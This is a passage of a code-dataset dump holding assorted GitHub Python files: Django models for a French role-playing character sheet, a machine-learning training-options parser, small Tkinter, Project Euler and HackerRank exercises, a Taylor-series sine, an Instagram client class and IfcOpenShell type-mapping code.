et d'avoir un tracking ?\n equipment = None\n\n artefact = None\n tresor = None\n precious = None\n\n resources = None\n\n # rindath, exaltation calculé automatiquement => sert à la valeur maximal.\n # valeur sauvé = valeur actuel\n rindath = None\n ogham = None\n exaltation = None\n major_miracles = None\n minor_miracles = None\n mineral_flux = None\n vegetal_flux = None\n organic_flux = None\n fossil_flux = None\n\n birthplace = None\n residence = None # Rural / Urban\n social = None\n story = models.TextField(verbose_name='histoire',\n blank=True)\n setback = models.ForeignKey(Setback, null=True, on_delete=models.SET_NULL,\n verbose_name='Revers')\n\n mental_health = models.PositiveSmallIntegerField()\n mental_resistance = models.PositiveSmallIntegerField()\n\n personality = models.TextField(blank=True)\n\n xp = models.PositiveSmallIntegerField(default=0)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Personnage'\n verbose_name_plural = 'Personnages'\n ordering = (\"name\",)\n\n def profession_changed(sender, **kwargs):\n if kwargs['instance'].profession.count() > 2:\n raise ValidationError(\"Vous ne pouvez pas avoir plus de 2 métiers\")\n\n # This will not work cause m2m fields are saved after the model is saved\n\n def check_xp(self):\n ''' Le choix d'un metier dnne directement un niveau de 5 dans un Domaine de compétence (Domaine Primaire) et\n de 3 dans un domaine secondaire'''\n # Check if primary_domain and secondary_domain are in domain.\n # Check if primary_domain = the same primary domain of profession\n # Check if secondary_domain is in secondary domain of profession\n # Check if primary_domain == 5\n # Check if secondary_domain is 3 min\n # Check if\n\n def clean(self):\n super().clean()\n if self.ways.count() != 5:\n raise ValidationError(\"Il y a {} voies au lieu de 5\".format(self.ways.count()))\n total = 0\n max_min = False\n for way in self.ways.all():\n total += way.level\n if way.level == 1 or way.level == 5:\n max_min = True\n if 15 != total:\n raise ValidationError(\"La somme des voies doit être égal à 15.\")\n if not max_min:\n raise(ValidationError(\"Au moins une voie doit être à 5 ou à 1.\"))\n\n\nclass SkillLevels(models.Model):\n domainLevel = models.ForeignKey(Domain, null=True, on_delete=models.CASCADE)\n level = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])\n FIRST = '1'\n SECOND = '2'\n STANDARD = 'ST'\n TYPES = (\n (FIRST, 'Premier'),\n (SECOND, 'Second'),\n (STANDARD, 'Standard')\n )\n types_domain = models.CharField(max_length=2, choices=TYPES, default=STANDARD)\n personage = models.ForeignKey(Personage, null=True, on_delete=models.CASCADE, related_name='skills')\n\n def __str__(self):\n return self.domainLevel.name + ' niveau ' + str(self.level) + ' avec les disciplines : ' + str(self.disciplineLevel)\n\n # limiter domaine de 1 à 5. 
(ou de 0 à 5 suivant comment on voit les choses)\n    # test si domaine est à 5 pour pouvoir avoir une discipline\n    # test si discipline est bien dans le domaine\n    # discipline va de 6 à 15\n\n    class Meta:\n        verbose_name = 'Compétence'\n\n    def clean(self):\n        super().clean()\n        if self.domainLevel in self.personage.skills.all():\n            raise ValidationError(\"Le personnage a déjà ce domaine\")\n        if self.types_domain == self.FIRST:\n            if self.personage.skills.filter(types_domain=self.FIRST).exists():\n                raise ValidationError(\"Un domaine primaire existe déjà.\")\n            if self.level != 5:\n                raise ValidationError(\"Un domaine primaire est forcément à 5\")\n        if self.types_domain == self.SECOND:\n            if self.personage.skills.filter(types_domain=self.SECOND).exists():\n                raise ValidationError(\"Un domaine secondaire existe déjà.\")\n            if self.level < 3:\n                raise ValidationError(\"Un domaine secondaire doit être au minimum à 3\")\n        # si domaine primaire ou secondaire, tester si notre personnage n'a pas deja un primaire (ou secondaire)\n\n\nclass DisciplineLevels(models.Model):\n    skill = models.ForeignKey(Discipline, null=True, on_delete=models.SET_NULL)\n    level = models.PositiveIntegerField(validators=[MinValueValidator(6), MaxValueValidator(15)])\n    skill_level = models.ForeignKey(SkillLevels,\n                                    null=True,\n                                    on_delete=models.CASCADE,\n                                    related_name='discipline_levels')\n\n    def __str__(self):\n        return self.skill.name + ' niveau ' + str(self.level)\n\n    def clean(self):\n        super().clean()\n        if self.skill_level.domainLevel not in self.skill.domains.all():\n            raise ValidationError(\"La discipline ne fait pas partie du domaine\")\n        if self.skill_level.level != 5:\n            raise ValidationError(\"Le domaine doit être à 5 pour pouvoir prendre une discipline\")\n\n\nclass WaysLevels(models.Model):\n    way = models.ForeignKey(Way, blank=True, on_delete=models.CASCADE, related_name='ways_level')\n    level = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])\n    personage = models.ForeignKey(Personage, null=True, on_delete=models.CASCADE, related_name='ways')\n","repo_name":"inconnu259/jdr-master","sub_path":"server/personage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15541,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29484875960","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport glob\nimport argparse\nimport collections\nimport types\nimport yaml\nimport re\n\nimport myutils\n\nclass YamlLoader(object):\n    def __init__(self, file_load):\n        if not os.path.exists(file_load):\n            errstr = \"ERROR: File {} does not exist, cannot find configuration\"\n            print(errstr.format(file_load))\n            sys.exit(1)\n        with open(file_load, 'r') as f:\n            yamldict = yaml.load(f)\n        self.__dict__.update(yamldict)\n        self.yamldict = yamldict\n\nclass DatasetParams(YamlLoader):\n    def __init__(self, opts):\n        fname = os.path.join('config', 'datasets', opts.dataset + '.yaml')\n        super().__init__(fname)\n        self.data_dir=os.path.join(opts.datasets_dir, opts.dataset)\n        default_sizes={ 'train': 40000, 'test': 3000 }\n        if 'sizes' not in self.__dict__:\n            self.sizes = default_sizes\n        else:\n            for k in default_sizes:\n                if k not in self.sizes:\n                    self.sizes[k] = default_sizes[k]\n\nconfig_len = len('config/datasets/')\nyaml_len = len('.yaml')\ndataset_files = sorted(glob.glob(os.path.join('config','datasets','*.yaml')))\ndataset_choices = [ x[config_len:-yaml_len] for x in dataset_files 
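# strip the 'config/datasets/' prefix and the '.yaml' suffix to get bare dataset names\n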
]\n\nclass ArchParams(YamlLoader):\n def __init__(self, opts):\n fname = os.path.join('config', 'architectures', opts.architecture+'.yaml')\n super().__init__(fname)\n\narch_files = sorted(glob.glob(os.path.join('config','architectures','*.yaml')))\nconfig_len = len('config/architectures/')\narch_choices = [ x[config_len:-yaml_len] for x in arch_files ]\n\nloss_types = [ 'l2', 'l1', 'l1l2' ]\noptimizer_types = ['sgd','adam','adadelta','momentum','adamw']\nlr_decay_types = ['exponential','fixed','polynomial']\n\n\ndef get_opts():\n \"\"\"Parse arguments from command line and get all options for training.\"\"\"\n parser = argparse.ArgumentParser(description='Train motion estimator')\n # Directory and dataset options\n parser.add_argument('--save_dir',\n default='',\n help='Directory to save out logs and checkpoints')\n parser.add_argument('--checkpoint_start_dir',\n default=None,\n help='Place to load from if not loading from save_dir')\n parser.add_argument('--data_dir',\n default='/NAS/data/stephen/',\n help='Directory for saving/loading dataset')\n parser.add_argument('--rome16k_dir',\n default='/NAS/data/stephen/Rome16K',\n help='Directory for storing Rome16K dataset (Very specific)')\n # 'synth_noise1', 'synth_noise2'\n parser.add_argument('--dataset',\n default=dataset_choices[0],\n choices=dataset_choices,\n help='Choose which dataset to use')\n parser.add_argument('--datasets_dir',\n default='/NAS/data/stephen',\n help='Directory where all the datasets are')\n parser.add_argument('--shuffle_data',\n default=True,\n type=myutils.str2bool,\n help='Shuffle the dataset or no?')\n\n # Architecture parameters\n parser.add_argument('--architecture',\n default=arch_choices[0],\n choices=arch_choices,\n help='Network architecture to use')\n parser.add_argument('--final_embedding_dim',\n default=None,\n type=int,\n help='Dimensionality of the output')\n\n # Machine learning parameters\n parser.add_argument('--batch_size',\n default=32,\n type=int,\n help='Size for batches')\n # TODO: Combine next two to add post-processing option\n parser.add_argument('--use_clamping',\n default=False,\n type=myutils.str2bool,\n help='Use clamping to [0, 1] on the output similarities')\n parser.add_argument('--use_abs_value',\n default=False,\n type=myutils.str2bool,\n help='Use absolute value on the output similarities')\n parser.add_argument('--loss_type',\n default=loss_types[0],\n choices=loss_types,\n help='Loss function to use for training')\n parser.add_argument('--reconstruction_loss',\n default=1.0,\n type=float,\n help='Use true adjacency or noisy one in loss')\n parser.add_argument('--geometric_loss',\n default=-1,\n type=float,\n help='Weight to use on the geometric loss')\n parser.add_argument('--weight_decay',\n default=4e-5,\n type=float,\n help='Weight decay regularization')\n parser.add_argument('--weight_l1_decay',\n default=0,\n type=float,\n help='L1 weight decay regularization')\n parser.add_argument('--optimizer_type',\n default=optimizer_types[0],\n choices=optimizer_types,\n help='Optimizer type for adaptive learning methods')\n parser.add_argument('--learning_rate',\n default=1e-3,\n type=float,\n help='Learning rate for gradient descent')\n parser.add_argument('--momentum',\n default=0.6,\n type=float,\n help='Learning rate for gradient descent')\n parser.add_argument('--learning_rate_decay_type',\n default=lr_decay_types[0],\n choices=lr_decay_types,\n help='Learning rate decay policy')\n parser.add_argument('--min_learning_rate',\n default=1e-5,\n type=float,\n help='Minimum 
learning rate after decaying')\n parser.add_argument('--learning_rate_decay_rate',\n default=0.95,\n type=float,\n help='Learning rate decay rate')\n parser.add_argument('--learning_rate_continuous',\n default=False,\n type=myutils.str2bool,\n help='Number of epochs before learning rate decay')\n parser.add_argument('--learning_rate_decay_epochs',\n default=4,\n type=float,\n help='Number of epochs before learning rate decay')\n\n # Training options\n parser.add_argument('--train_time',\n default=-1,\n type=int,\n help='Time in minutes the training procedure runs')\n parser.add_argument('--num_epochs',\n default=-1,\n type=int,\n help='Number of epochs to run training')\n parser.add_argument('--test_freq',\n default=-1,\n type=int,\n help='Minutes between running loss on test set.'\n 'If less than zero, does not check time for testing')\n parser.add_argument('--test_freq_steps',\n default=-1,\n type=int,\n help='Number of steps between running loss on test set'\n 'If less than zero, does not check steps for testing')\n\n # Logging options\n parser.add_argument('--verbose',\n default=False,\n type=myutils.str2bool,\n help='Print out everything')\n parser.add_argument('--save_summaries_secs',\n default=120,\n type=int,\n help='How frequently in seconds we save training summaries')\n parser.add_argument('--save_interval_secs',\n default=600,\n type=int,\n help='Frequency in seconds to save model while training')\n parser.add_argument('--log_steps',\n default=5,\n type=int,\n help='How frequently we print training loss')\n\n # Debugging options\n parser.add_argument('--debug',\n default=False,\n type=myutils.str2bool,\n help='Run in debug mode')\n\n\n opts = parser.parse_args()\n\n ##### Post processing\n # Dataset\n dataset_params = DatasetParams(opts)\n opts.data_dir = dataset_params.data_dir\n if opts.final_embedding_dim is None:\n opts.final_embedding_dim = dataset_params.points[-1]\n setattr(opts, 'dataset_params', dataset_params)\n\n # Set up architecture\n arch = ArchParams(opts)\n setattr(opts, 'arch', arch)\n\n # Save out directory\n if opts.save_dir == '':\n print(''.join([ '=' ] * 20), file=sys.stderr)\n print('WARNING: save_dir not set, '\n 'going to default /tmp/discard_dir', file=sys.stderr)\n print(''.join([ '=' ] * 20), file=sys.stderr)\n opts.save_dir = '/tmp/discard_dir'\n if os.path.exists(opts.save_dir):\n import shutil\n shutil.rmtree(opts.save_dir)\n os.makedirs(opts.save_dir)\n elif not os.path.exists(opts.save_dir):\n os.makedirs(opts.save_dir)\n\n # Checkpoint loading\n if opts.checkpoint_start_dir and not os.path.exists(opts.checkpoint_start_dir):\n print(\"ERROR: Checkpoint Directory {} does not exist\".format(opts.checkpoint_start_dir))\n return\n\n yaml_fname = os.path.join(opts.save_dir, 'options.yaml')\n if not os.path.exists(yaml_fname):\n with open(yaml_fname, 'w') as yml:\n yml.write(yaml.dump(opts.__dict__))\n\n # Finished, return options\n return opts\n\ndef parse_yaml_opts(opts):\n with open(os.path.join(opts.save_dir, 'options.yaml'), 'r') as yml:\n yaml_opts = yaml.load(yml)\n opts.__dict__.update(yaml_opts)\n return opts\n\n\n","repo_name":"stephenphillips42/cycleconsistencynet","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41683568665","text":"# Python Tkinter How Validate an Entry Widget Integer\n# Python Tkinter Cómo validar un entero de widget de entrada\n\nfrom tkinter import *\n\nroot = 
Tk()\nroot.title('Python Tkinter How Validate an Entry Widget Integer')\nroot.iconbitmap('Python Tkinter How Validate an Entry Widget Integer/api.ico')\nroot.geometry(\"400x400\")\n\ndef number():\n    try:\n        int(my_box.get())\n        answer.config(text=\"That is a number! Congrats!\")\n        \n    except ValueError:\n        answer.config(text=\"That is NOT a number!\")\n\n\nmy_label = Label(root, text=\"Enter a Number\")\nmy_label.pack(pady=20)\n\nmy_box = Entry(root)\nmy_box.pack(pady=10)\n\nmy_button = Button(root, text=\"Enter a Number\", command=number)\nmy_button.pack(pady=5)\n\nanswer = Label(root, text=\"\")\nanswer.pack(pady=5)\n\n\nroot.mainloop()\n\n\n","repo_name":"BrianMarquez3/Python-Course","sub_path":"Python Tkinter How Validate an Entry Widget Integer/howValidadeEntryWidgetInteger.py","file_name":"howValidadeEntryWidgetInteger.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"29032267261","text":"from collections import deque\n\ndef maxDigitProductFromFile(file_name: str, n: int) -> int:\n    f = open(file_name, \"r\")\n    max_product = 0\n    product = 1\n    window = deque([])\n    for line in f:\n        for char in line.rstrip():\n            num = int(char)\n            if num == 0:\n                # a zero invalidates every window containing it; restart\n                window.clear()\n                product = 1\n                continue\n            if len(window) < n:\n                window.append(num)\n                product *= num\n            else:\n                head = window.popleft()\n                window.append(num)\n                product = (product // head) * num\n            # only count windows that actually contain n digits\n            if len(window) == n and product > max_product:\n                max_product = product\n    f.close()\n    return max_product\n\nresult = maxDigitProductFromFile(\"./8_input.txt\", 13)\nprint(result)\n","repo_name":"lesterfernandez/euler","sub_path":"p8_largest_product_in_series.py","file_name":"p8_largest_product_in_series.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73276492625","text":"'''\nProblem link:\nhttps://www.hackerrank.com/challenges/one-month-preparation-kit-lonely-integer/problem?isFullScreen=true&h_l=interview&playlist_slugs%5B%5D=preparation-kits&playlist_slugs%5B%5D=one-month-preparation-kit&playlist_slugs%5B%5D=one-month-week-one\n'''\n\n'''\nSteps to solve the problem.\n- First, build a set (uniques) of the distinct values in the list (ar).\n- Second, traverse the set (uniques) and call count() on the list (ar) for each\n unique value.\n- Third, as soon as a value with a count of exactly 1 is found, return it.\n- Fourth, return -1 if every value is paired. 
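\n\nA linear-time alternative (not the approach used below) XORs all the values;\nevery value that appears twice cancels itself out, leaving the lonely one:\n    from functools import reduce\n    from operator import xor\n    lonely = reduce(xor, ar)\nThis relies on the problem's guarantee that all other values occur exactly twice. 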
\n'''\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef lonelyinteger(ar):\n    # Write your code here\n    uniques = set(ar)\n\n    for unique in uniques:\n        if ar.count(unique) == 1:\n            return unique\n\n    return -1\n\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(input().strip())\n\n    ar = list(map(int, input().rstrip().split()))\n\n    result = lonelyinteger(ar)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"Thevic16/python_competitive_programming_problems","sub_path":"problems/others_problems/codeforcers_ladder/3-lonely_integer.py","file_name":"3-lonely_integer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2134836205","text":"#!/usr/bin/env python3\nimport math\n\ndef fakultet(n):\n    product = 1\n    for number in range(2, n+1):\n        product *= number\n    return product\n\ndef taylor_sin(x):\n    \"\"\"\n    We know that\n    sin(x) = x - x^3/3! + x^5/5! - x^7/7! + x^9/9! - ...\n    \n    This function calculates sin using this formula.\n    The loop stops once the next term's magnitude drops below EPSILON;\n    for an alternating series this also bounds the truncation error.\n    \"\"\"\n    # term holds the most recently computed term (initialized to the first term, x)\n    sum_ = 0\n    term = x\n    \n    EPSILON = 1e-10\n    k = 1 # k corresponds to \"x^k/k!\" in a term\n    sign = 1 # alternates between 1 and -1; the first term, +x, is positive\n    while abs(term) > EPSILON:\n        term = sign * x**k / fakultet(k)\n        sum_ += term\n        sign = -sign\n        k += 2\n    \n    return sum_\n\ndef test_taylor_sin():\n    MAX_ACCEPTED_ERROR = 1e-5\n    \n    START_T = -10.0\n    END_T = 10.0\n    NUM_TESTS = 100\n    step = (END_T - START_T) / NUM_TESTS\n    \n    t = START_T\n    while t < END_T:\n        t += step\n        error = abs(taylor_sin(t) - math.sin(t))\n        assert error < MAX_ACCEPTED_ERROR\n    \ntest_taylor_sin()\n\nt = 0.37\nprint(\"t =\", t)\nprint(\"taylor_sin:\", taylor_sin(t))\nprint(\"math.sin:  \", math.sin(t))\nprint()\n\nt = 2.16\nprint(\"t =\", t)\nprint(\"taylor_sin:\", taylor_sin(t))\nprint(\"math.sin:  \", math.sin(t))\nprint()\n","repo_name":"Ran4/dd1331-public","sub_path":"ex02/ran_sin.py","file_name":"ran_sin.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74040058386","text":"from instaclient import LOGGER\nfrom typing import List, Optional, TYPE_CHECKING\nimport json\n\nif TYPE_CHECKING:\n    from instaclient.client.instaclient import InstaClient\n\nclass Address():\n    def __init__(self, address:str, **kwargs):\n        try:\n            data = json.loads(address)\n            self.street_address = data.get('street_address')\n            self.zip_code = data.get('zip_code')\n            self.city_name = data.get('city_name')\n            self.region_name = data.get('region_name')\n            self.country_code = data.get('country_code')\n            self.exact_city_match = data.get('exact_city_match')\n            self.exact_region_match = data.get('exact_region_match')\n            self.exact_country_match = data.get('exact_country_match')\n        except Exception as error:\n            LOGGER.warning('Error when loading location Address', exc_info=error)\n\n    def __repr__(self) -> str:\n        return f'Address<{self.city_name}>'\n\n    \n    def to_dict(self) -> dict:\n        data = vars(self)\n        for key in data:\n            if isinstance(data[key], list):\n                values = list()\n                for item in data[key]:\n                    if hasattr(item, 'to_dict'):\n                        values.append(item.to_dict())\n                        continue\n                    values.append(item)\n                data[key] = values\n        return 
data","repo_name":"davidwickerhf/instaclient","sub_path":"instaclient/instagram/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"48"} +{"seq_id":"71316472787","text":"###############################################################################\n# #\n# This file is part of IfcOpenShell. #\n# #\n# IfcOpenShell is free software: you can redistribute it and/or modify #\n# it under the terms of the Lesser GNU General Public License as published by #\n# the Free Software Foundation, either version 3.0 of the License, or #\n# (at your option) any later version. #\n# #\n# IfcOpenShell is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# Lesser GNU General Public License for more details. #\n# #\n# You should have received a copy of the Lesser GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nimport nodes\nimport templates\n\nclass Mapping:\n\n express_to_cpp_typemapping = {\n 'boolean' : 'bool',\n 'logical' : 'bool',\n 'integer' : 'int',\n 'real' : 'double',\n 'number' : 'double',\n 'string' : 'std::string'\n }\n\n def __init__(self, schema):\n self.schema = schema\n \n def flatten_type_string(self, type):\n return self.flatten_type_string(self.schema.types[type].type.type) if self.schema.is_simpletype(type) else type\n \n def flatten_type(self, type):\n res = self.flatten_type(self.schema.types[type].type.type) if self.schema.is_simpletype(type) else type\n return res\n \n def simple_type_parent(self, type):\n parent = self.schema.types[type].type.type\n if isinstance(parent, nodes.AggregationType): parent = None\n return None if parent in self.express_to_cpp_typemapping else parent\n\n def make_type_string(self, type):\n if isinstance(type, str):\n return self.express_to_cpp_typemapping.get(type, type)\n else:\n is_list = self.schema.is_entity(type.type)\n is_nested_list = isinstance(type.type, nodes.AggregationType)\n tmpl = templates.list_list_type if is_nested_list else templates.list_type if is_list else templates.array_type\n return tmpl % {\n 'instance_type' : self.make_type_string(type.type),\n 'lower' : type.bounds.lower,\n 'upper' : type.bounds.upper,\n }\n\n def is_array(self, type):\n if isinstance(type, nodes.AggregationType):\n return True\n elif isinstance(type, str) and self.schema.is_type(type):\n return self.is_array(self.schema.types[type].type.type)\n else:\n return False\n \n def make_argument_entity(self, attr):\n type = attr.type if hasattr(attr, 'type') else attr\n while isinstance(type, nodes.AggregationType): type = type.type\n if type in self.express_to_cpp_typemapping or isinstance(type, nodes.BinaryType): return \"Type::UNDEFINED\"\n else: return \"Type::%s\" % type \n\n def make_argument_type(self, attr):\n def _make_argument_type(type):\n if type in self.express_to_cpp_typemapping:\n return self.express_to_cpp_typemapping.get(type, type).split('::')[-1].upper()\n elif self.schema.is_entity(type):\n return \"ENTITY\"\n elif self.schema.is_type(type):\n return _make_argument_type(self.schema.types[type].type.type)\n elif isinstance(type, nodes.BinaryType):\n return \"UNKNOWN\"\n elif isinstance(type, nodes.EnumerationType):\n return \"ENUMERATION\"\n elif isinstance(type, nodes.SelectType):\n return 
\"ENTITY\"\n elif isinstance(type, nodes.AggregationType):\n ty = _make_argument_type(type.type)\n if ty == \"UNKNOWN\": return \"UNKNOWN\"\n return \"%s_LIST\"%ty if ty.startswith(\"ENTITY\") else (\"VECTOR_%s\"%ty)\n else: raise ValueError\n supported = {'INT', 'BOOL', 'DOUBLE', 'STRING', 'VECTOR_INT', 'VECTOR_DOUBLE', 'VECTOR_STRING', 'ENTITY', 'ENTITY_LIST', 'ENTITY_LIST_LIST', 'ENUMERATION'}\n ty = _make_argument_type(attr.type if hasattr(attr, 'type') else attr)\n if ty not in supported: ty = 'UNKNOWN'\n return \"IfcUtil::Argument_%s\" % ty\n\n def get_type_dep(self, type):\n if isinstance(type, str):\n return self.express_to_cpp_typemapping.get(type, type)\n else:\n return self.get_type_dep(type.type)\n\n def get_parameter_type(self, attr, allow_optional, allow_entities, allow_pointer = True):\n \n attr_type = self.flatten_type(attr.type)\n type_str = self.express_to_cpp_typemapping.get(str(attr_type), attr_type)\n \n is_ptr = False\n \n if self.schema.is_enumeration(attr_type):\n type_str = '%s::%s'%(attr_type, attr_type)\n elif isinstance(type_str, nodes.AggregationType):\n is_nested_list = isinstance(attr_type.type, nodes.AggregationType)\n ty = self.get_parameter_type(attr_type.type if is_nested_list else attr_type, False, allow_entities, False)\n if True and self.schema.is_select(attr_type.type):\n type_str = templates.untyped_list\n elif self.schema.is_simpletype(ty) or ty in self.express_to_cpp_typemapping.values():\n type_str = templates.array_type % {\n 'instance_type' : ty,\n 'lower' : attr_type.bounds.lower,\n 'upper' : attr_type.bounds.upper\n }\n else:\n tmpl = templates.list_list_type if is_nested_list else templates.list_type\n type_str = tmpl % {\n 'instance_type': ty\n }\n elif allow_pointer and (self.schema.is_entity(type_str) or self.schema.is_select(type_str)):\n type_str += '*'\n is_ptr = True\n elif not allow_pointer and self.schema.is_select(type_str):\n type_str = \"IfcUtil::IfcBaseClass*\"\n is_ptr = True\n if allow_optional and attr.optional and not is_ptr:\n type_str = \"boost::optional< %s >\"%type_str\n return type_str\n\n def argument_count(self, t):\n c = sum([self.argument_count(self.schema.entities[s]) for s in t.supertypes])\n return c + len(t.attributes)\n\n def arguments(self, t):\n c = sum([self.arguments(self.schema.entities[s]) for s in t.supertypes], [])\n return c + t.attributes\n\n def derived_in_supertype(self, t):\n c = sum([self.derived_in_supertype(self.schema.entities[s]) for s in t.supertypes], [])\n return c + ([str(s) for s in t.derive.elements] if t.derive else [])\n\n def list_instance_type(self, attr):\n f = lambda v : 'IfcUtil::IfcBaseClass' if self.schema.is_select(v) else v\n if self.is_array(attr.type):\n if not isinstance(attr.type, str) and self.is_array(attr.type.type):\n if isinstance(attr.type.type, str):\n return f(attr.type.type)\n else: return f(attr.type.type.type)\n else:\n if isinstance(attr.type, str):\n return f(attr.type)\n else: return f(attr.type.type)\n return None\n\n def is_templated_list(self, attr):\n ty = self.list_instance_type(attr)\n arr = self.is_array(attr.type)\n simple = self.schema.is_simpletype(ty)\n express = ty in self.express_to_cpp_typemapping\n select = ty == 'IfcUtil::IfcBaseClass'\n return arr and not simple and not express and not select\n\n def get_assignable_arguments(self, t, include_derived = False):\n count = self.argument_count(t)\n num_inherited = count - len(t.attributes)\n derived = set(self.derived_in_supertype(t))\n attrs = enumerate(self.arguments(t))\n\n def include(attr):\n 
not_derived = include_derived or (attr.name not in derived)\n supported = self.make_argument_type(attr) != \"IfcUtil::Argument_UNKNOWN\"\n return not_derived and supported\n\n return [{\n 'index' : i+1,\n 'name' : attr.name,\n 'full_type' : self.get_parameter_type(attr, allow_optional=True, allow_entities=True),\n 'specialized_type' : self.get_parameter_type(attr, allow_optional=True, allow_entities=False),\n 'non_optional_type' : self.get_parameter_type(attr, allow_optional=False, allow_entities=False),\n 'list_instance_type' : self.list_instance_type(attr),\n 'is_optional' : attr.optional,\n 'is_inherited' : i < num_inherited,\n 'is_enum' : attr.type in self.schema.enumerations,\n 'is_array' : self.is_array(attr.type),\n 'is_nested' : self.is_array(attr.type) and not isinstance(attr.type, str) and self.is_array(attr.type.type),\n 'is_derived' : attr.name in derived,\n 'is_templated_list' : self.is_templated_list(attr),\n 'argument_type_enum' : self.make_argument_type(attr),\n 'argument_entity' : self.make_argument_entity(attr),\n 'argument_type' : attr.type\n } for i, attr in attrs if include(attr)]\n\n","repo_name":"aothms/IfcOpenShell_PythonWrapper","sub_path":"src/ifcexpressparser/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"35015198623","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta as td\n\nfrom openerp import api, fields, models\nfrom openerp.fields import Date as fDate\nfrom openerp.exceptions import UserError\n\n\nclass Animal(models.Model):\n _name = 'myo.animal'\n _inherit = 'myo.random.model'\n\n @api.multi\n @api.depends('name', 'code', 'age')\n def name_get(self):\n result = []\n for record in self:\n result.append(\n (record.id,\n u'%s [%s] (%s)' % (record.name, record.code, record.age)\n ))\n return result\n\n name = fields.Char('Name', required=True)\n alias = fields.Char('Alias', help='Common name that the Animal is referred.')\n code = fields.Char(string='Animal Code', required=False)\n user_id = fields.Many2one('res.users', 'Animal Responsible', required=False, readonly=False)\n notes = fields.Text(string='Notes')\n date_inclusion = fields.Datetime(\"Inclusion Date\", required=False, readonly=False,\n default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n country_id = fields.Many2one('res.country', 'Nationality')\n birthday = fields.Date(\"Date of Birth\")\n age = fields.Char(\n string='Age',\n compute='_compute_age',\n store=True\n )\n estimated_age = fields.Char(string='Estimated Age', required=False)\n # date_reference = fields.Date(\"Reference Date\")\n # age_reference = fields.Char(\n # string='Reference Age',\n # compute='_compute_age_reference',\n # store=True\n # )\n father_id = fields.Many2one('myo.animal', 'Father', ondelete='restrict')\n mother_id = fields.Many2one('myo.animal', 'Mother', ondelete='restrict')\n tutor_id = fields.Many2one('myo.person', 'Tutor', ondelete='restrict')\n identification_id = fields.Char('Animal ID')\n gender = fields.Selection(\n [('M', 'Male'),\n ('F', 'Female')\n ], 'Gender'\n )\n spayed = fields.Selection(\n [('Y', 'Yes'),\n ('N', 'No')\n ], 'Spayed'\n )\n species_id = fields.Many2one('myo.animal.species', 'Species', ondelete='restrict')\n breed_id = fields.Many2one(\n 'myo.animal.breed',\n 'Breed', ondelete='restrict',\n domain=\"[('species_id','=',species_id)]\"\n )\n breed = 
fields.Text(string='Breed')\n active = fields.Boolean('Active',\n help=\"If unchecked, it will allow you to hide the animal without removing it.\",\n default=1)\n\n _order = 'name'\n\n _sql_constraints = [\n ('code_uniq',\n 'UNIQUE(code)',\n u'Error! The Animal Code must be unique!'\n )\n ]\n\n @api.multi\n @api.constrains('birthday')\n def _check_birthday(self):\n for animal in self:\n if animal.birthday > fields.Date.today():\n raise UserError(u'Date of Birth must be in the past!')\n\n @api.one\n @api.depends('birthday')\n def _compute_age(self):\n now = datetime.now()\n if self.birthday:\n dob = datetime.strptime(self.birthday, '%Y-%m-%d')\n delta = relativedelta(now, dob)\n # self.age = str(delta.years) + \"y \" + str(delta.months) + \"m \" + str(delta.days) + \"d\"\n self.age = str(delta.years)\n else:\n self.age = \"No Date of Birth!\"\n\n # @api.one\n # @api.depends('date_reference', 'birthday')\n # def _compute_age_reference(self):\n # if self.date_reference:\n # # now = self.date_reference\n # if self.birthday:\n # dob = datetime.strptime(self.birthday, '%Y-%m-%d')\n # now = datetime.strptime(self.date_reference, '%Y-%m-%d')\n # delta = relativedelta(now, dob)\n # # self.age_reference = str(delta.years) + \"y \" + str(delta.months) + \"m \" + str(delta.days) + \"d\"\n # self.age_reference = str(delta.years)\n # else:\n # self.age_reference = \"No Date of Birth!\"\n # else:\n # self.age_reference = \"No Reference Date!\"\n","repo_name":"MostlyOpen/odoo_addons","sub_path":"myo_animal/models/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44082862986","text":"# 0-100间 所有偶数和\nsum = 0\nprint('计算0-100间所有偶数和')\nfor i in range(0,101,2):# 因为是要求偶数 所有要几个2\n sum +=i\nprint(sum)\n\n# 打印99乘法表\ni =1\nwhile i <10:\n j = 1\n while j<=i:\n print('%d*%d=%d\\t'%(j,i,i*j),end = '')\n j += 1\n print('')\n i += 1\n\nvarl = int(input('请输入一个整数:'))\nif varl >0 and varl<10:\n 